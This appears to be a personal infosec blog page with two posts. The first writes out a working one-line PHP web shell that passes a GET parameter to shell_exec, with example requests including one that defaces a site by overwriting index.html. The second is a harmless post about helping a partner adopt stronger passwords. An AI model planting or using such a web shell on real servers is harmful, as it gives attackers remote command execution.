Single Line PHP Script to Gain Shell

A while ago, on PaulDotCom Security Weekly, I heard someone mention something about a single line php script to get shell on the web server. I knew it couldn’t be that hard as it’s only one line, but I didn’t find much about it on google when I searched, perhaps because it’s too easy, or perhaps I was using the wrong search terms. Anyway, I forgot about it for a while… until now.

Since WebApp security is what I’m most interested in at the moment, I have been learning PHP, I’m not finished learning yet, but today (while reading about how inputs should be sanitised before using “include”) I remembered the single line PHP shell, and I had a go and this is what I came up with:

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Obviously the WebApp would have to be vulnerable in some way in order to be able to put this script on the server, but once it was, it could potentially be used to do things like dump files and deface the site.

The output is just text, not an HTML document so if using a web browser, you will want to view the source in order to see the proper result.

I used shell_exec() instead of just exec() because it returns every line instead of just the last one. An alternative is to use passthru() which will also send binary data, but to get that to work properly with binary data, you’d probably have to also set the headers which makes it more than one line.

I was able to run unix commands (windows commands should also work if the host is running windows) such as:

  • shell.php?e=whoami
  • shell.php?e=pwd
  • shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
  • shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
  • shell?e=ls%20-l%20/tmp

The last command even showed me some files and their owners which in turn (because I am using a shared host) told me the names of some of the other sites are that are running on the same server as mine, which was an unexpected “bonus” find.

My Fiancée is Using Better Passwords Than Me!

I upgraded my Mac laptop to OS X 10.8 Mountain Lion a few weeks ago, and at the same time I decided to turn on FileVault for (almost) full disk encryption. I’m not paranoid, but If I want to get into infosec, I should at least try to be secure myself.

Around the same time my fiancée had said that her Windows laptop was running slow, and then her hotmail account got compromised. I checked her laptop for anything malicious (all seemed ok) but I didn’t have time to try and find out why it was running slow right then, so I set her up with an account on my Mac laptop. I had not enforced any password policy on my Mac laptop (I’m not even sure how to do that – I’ll have to find out soon), so I asked her if she would mind telling me what password she had used because her password would be able to unlock the FileVault (almost) full disk encryption and her password could be the weak link.

She obviously trusts me because she told me, and I knew from experience with John The Ripper/Hascat/etc that it would easily be cracked using brute force by the proper tools in a matter of seconds because it followed a very common pattern. It turned out that her hotmail account was using a similarly simple password, so it was no great surprise that it had been compromised.

I explained with the help of this great XKCD comic that a password can be hard to crack, but easy to remember:

She is now using a passwords around 30 characters long! This means some of her passwords are probably stronger than some of mine… I have some catching up to do!